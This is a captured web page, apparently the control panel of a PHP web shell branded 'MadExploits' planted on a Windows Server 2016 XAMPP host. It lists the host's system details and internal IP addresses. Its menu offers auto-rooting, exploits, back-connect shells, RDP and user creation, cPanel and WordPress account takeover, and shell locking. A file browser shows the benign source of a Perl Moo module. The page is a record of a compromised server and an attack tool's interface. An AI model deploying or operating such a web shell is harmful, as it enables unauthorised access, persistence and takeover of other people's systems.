Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
perl /
vendor /
lib /
Moo /
[ HOME SHELL ]
Name
Size
Permission
Action
HandleMoose
[ DIR ]
drwxrwxrwx
HandleMoose.pm
7.67
KB
-rw-rw-rw-
Object.pm
1.9
KB
-rw-rw-rw-
Role.pm
14.63
KB
-rw-rw-rw-
_Utils.pm
4.32
KB
-rw-rw-rw-
_mro.pm
120
B
-rw-rw-rw-
_strictures.pm
304
B
-rw-rw-rw-
sification.pm
896
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sification.pm
package Moo::sification; use Moo::_strictures; no warnings 'once'; BEGIN { *_USE_DGD = "$]" < 5.014 ? sub(){1} : sub(){0}; require Devel::GlobalDestruction if _USE_DGD(); } use Carp qw(croak); BEGIN { our @CARP_NOT = qw(Moo::HandleMoose) } sub unimport { croak "Can't disable Moo::sification after inflation has been done" if $Moo::HandleMoose::SETUP_DONE; our $disabled = 1; } sub Moo::HandleMoose::AuthorityHack::DESTROY { unless (our $disabled or _USE_DGD ? Devel::GlobalDestruction::in_global_destruction() : ${^GLOBAL_PHASE} eq 'DESTRUCT' ) { require Moo::HandleMoose; Moo::HandleMoose->import; } } sub import { return if our $setup_done; if ($INC{"Moose.pm"}) { require Moo::HandleMoose; Moo::HandleMoose->import; } else { $Moose::AUTHORITY = bless({}, 'Moo::HandleMoose::AuthorityHack'); } $setup_done = 1; } 1;
Close